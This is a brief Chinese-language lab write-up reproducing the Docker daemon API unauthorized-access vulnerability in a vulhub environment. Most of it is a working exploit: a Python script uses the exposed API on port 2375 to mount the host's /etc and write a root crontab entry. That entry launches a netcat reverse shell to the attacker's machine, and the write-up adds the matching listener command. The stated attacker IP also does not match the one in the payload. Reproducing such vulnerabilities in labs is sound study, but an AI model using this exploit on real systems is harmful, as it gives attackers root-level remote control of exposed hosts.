docker daemon api 未授权访问漏洞复现

环境搭建

启动docker

systemctl start docker

获取vulhub

git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git

进入对应目录

cd vulhub/docker/unauthorized-rce/

启动容器

docker-compose up -d

查看容器

docker ps

这里的访问http://127.0.0.1:2375/version

这里kali的ip192.138.164.134
centos的ip192.168.42.133
exp.py

import docker

client = docker.DockerClient(base_url='http://192.168.42.133:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 192.168.42.134 4444 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={
     '/etc': {
     'bind': '/tmp/etc', 'mode': 'rw'}})

在kali启动监听

nc -lvvp 4444

参考文章

https://github.com/vulhub/vulhub/blob/master/docker/unauthorized-rce/README.zh-cn.md